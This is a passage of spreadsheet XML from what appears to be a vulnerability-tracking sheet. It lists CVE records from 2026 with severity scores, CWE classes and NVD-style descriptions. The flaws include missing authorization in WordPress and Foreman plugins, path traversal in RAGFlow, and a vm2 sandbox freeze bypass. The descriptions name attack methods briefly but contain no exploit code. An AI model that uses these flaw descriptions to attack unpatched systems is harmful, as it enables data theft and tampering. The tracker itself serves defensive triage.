          <t>WireGuard Portal, or wg-portal, is a web-based configuration portal for WireGuard server management. From 2.2.0 until 2.3.0, the authenticated GET /api/v0/ws statistics WebSocket in internal/app/api/v0/handlers/endpoint_websocket.go subscribes to TopicPeerStatsUpdated and TopicInterfaceStatsUpdated and forwards every TrafficDelta event without per-user authorization in handleWebsocket(). A low-privilege user can enumerate peer public keys through EntityId and monitor BytesReceived and BytesTransmitted values for peers belonging to other users. The same connection exposes interface_stats and interface names that the REST API limits to administrators. Tunnel content, AllowedIPs, and user identities remain authorization-gated. This issue is fixed in version 2.3.0.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54551</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78427</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>meissner@suse.de</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>The NeuVector admission webhook silently excludes containers from policy evaluation when their image path matches one of three hardcoded service mesh sidecar images. Since the image path is entirely controlled by the workload author, any user capable of deploying workloads can evade admission deny rules simply by naming their image path after one of these sidecar images.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78427</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87829</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>The Checkout Field Manager (Checkout Manager) for WooCommerce WordPress plugin before 7.9.7 does not properly validate the ownership of an attachment before deleting it, allowing any authenticated user such as a customer to delete arbitrary media attachments belonging to other users.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87829</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87831</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>The Checkout Field Manager (Checkout Manager) for WooCommerce WordPress plugin before 7.9.7 does not properly validate the ownership of an attachment before deleting it, allowing any authenticated user such as a customer to delete arbitrary media attachments belonging to other users.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87831</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91009</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-352, CWE-862</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>The Active Woot Products Tables for WooCommerce. 100% FREE  WordPress plugin before 2.1.3 does not have authorisation and CSRF checks in some of its AJAX actions, allowing any authenticated users, such as subscriber, to change the title of arbitrary posts, pages and products.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91009</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91010</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>The Invisible Anti-Spam &amp; CAPTCHA — reCAPTCHA Alternative for All Forms WordPress plugin before 5.1.1 does not check the user's capabilities in its message deletion AJAX action, and only tests that a nonce parameter is present rather than validating it, allowing any authenticated user, such as a subscriber, to permanently delete every form submission the Invisible Anti-Spam &amp; CAPTCHA — reCAPTCHA Alternative for All Forms WordPress plugin before 5.1.1 has stored.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91010</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92839</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>61adb53e-e4b3-47f7-8a93-4717c9e77dc6</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-174</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>Canva Desktop before v1.125.0 performed double decoding in the deeplink handler. A threat actor could cause the application to load arbitrary same-origin content under the user’s session.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92839</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92881</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr"/>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-369, CWE-404</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in vgmstream. The affected element is the function init_vgmstream_awb_memory of the file src/meta/awb.c of the component AWB parser. Such manipulation leads to divide by zero. The attack can be executed remotely. The name of the patch is ae37662ad626254ddd96ad69ac263792d7a92024. A patch should be applied to remediate this issue.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92881</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92893</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr"/>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the foreman_ansible plugin's Ansible inventory API. The controller builds its host query using an unscoped Host.where call that does not enforce the search filter associated with the caller's view_hosts permission. An authenticated user whose host visibility is restricted by a permission filter can supply arbitrary host IDs within their organization and receive the full Ansible inventory for those hosts, including parameter values marked as hidden.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92893</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92894</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr"/>
      <c r="K365" s="5" t="inlineStr"/>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the foreman_ansible plugin's Ansible override values API. The destroy action resolves the target LookupValue record by ID without verifying it belongs to an AnsibleVariable the caller is authorized to edit. An authenticated user with the edit_ansible_variables permission can delete any LookupValue by ID, including override values for Ansible variables outside their permission filter scope and override values belonging to Puppet smart class parameters.</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92894</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92904</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr"/>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the foreman_remote_execution plugin's template invocations controller. The show_template_invocation_by_host action resolves the job invocation by ID without evaluating the caller's view_job_invocations permission filter against the record. An authenticated user whose job invocation visibility is restricted by a permission filter can enumerate job invocation IDs and read the live output, rendered script, and input values for other users' job invocations within their own organizations.</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92904</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93013</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr"/>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>RAGFlow through 0.27.2 contains a path traversal vulnerability in the dev_insert_chunks_from_file and dev_insert_metadata_from_file endpoints that allows authenticated attackers to read arbitrary files by supplying absolute file paths in the file_path parameter. Attackers with valid access tokens can exploit missing path validation to read any file accessible to the service, with disclosure limited to files matching expected JSON structures that are then written to datasets.</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93013</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93307</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr"/>
      <c r="K368" s="5" t="inlineStr"/>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-789</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in O-RAN-SC SMO OAM 2025-06-10. Affected is an unknown function of the component VES Collector. Such manipulation of the argument additionalFields.padding leads to uncontrolled memory allocation. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The project was informed of the problem early through a bug report but has not responded yet.</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93307</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81441</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr"/>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>Dell OpenManage Server Administrator, versions prior to 11.1.0.3, contains a Missing Authentication for Critical Function vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to Denial of service.</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81441</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92949</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>4</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr"/>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-471</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>vm2 versions from 3.9.6 before 3.11.7 fail to properly restrict access to accessor properties on frozen objects, allowing sandboxed scripts to bypass vm.freeze() and vm.readonly() protections. Attackers can use Object.getOwnPropertyDescriptor() or __lookupSetter__() to extract and invoke host object setters directly, mutating properties the embedder explicitly marked read-only.</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92949</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12284</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E371" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F371" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G371" s="5" t="inlineStr"/>
      <c r="H371" s="5" t="inlineStr"/>
      <c r="I371" s="5" t="inlineStr"/>
      <c r="J371" s="5" t="inlineStr"/>
      <c r="K371" s="5" t="inlineStr"/>
      <c r="L371" s="5" t="inlineStr"/>
      <c r="M371" s="5" t="inlineStr"/>
      <c r="N371" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O371" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P371" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q371" s="5" t="inlineStr"/>
      <c r="R371" s="5" t="inlineStr">
        <is>
          <t>CWE-346</t>
        </is>
      </c>
      <c r="S371" s="5" t="inlineStr">
        <is>
          <t>Mattermost Desktop App versions &lt;=6.2 6.2.2.0 fails to validate the IPC sender in the leaveCall handler which allows a malicious or compromised Mattermost server (or a user with script access to a connected server view) to disconnect an active call belonging to a different connected server via the desktopAPI.leaveCall IPC message. Mattermost Advisory ID: MMSA-2026-00699</t>
        </is>
      </c>
      <c r="T371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12284</t>
        </is>
      </c>
    </row>
    <row r="372">
      <c r="A372" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B372" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61700</t>
        </is>
      </c>
      <c r="D372" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E372" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F372" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G372" s="5" t="inlineStr"/>
      <c r="H372" s="5" t="inlineStr"/>
      <c r="I372" s="5" t="inlineStr"/>
      <c r="J372" s="5" t="inlineStr"/>
      <c r="K372" s="5" t="inlineStr"/>
      <c r="L372" s="5" t="inlineStr">
        <is>
          <t>maven:org.mariadb.jdbc:mariadb-java-client</t>
        </is>
      </c>
      <c r="M372" s="5" t="inlineStr">
        <is>
          <t>2.7.14, 3.3.5, 3.4.3, 3.5.9</t>
        </is>
      </c>
      <c r="N372" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O372" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P372" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q372" s="5" t="inlineStr"/>
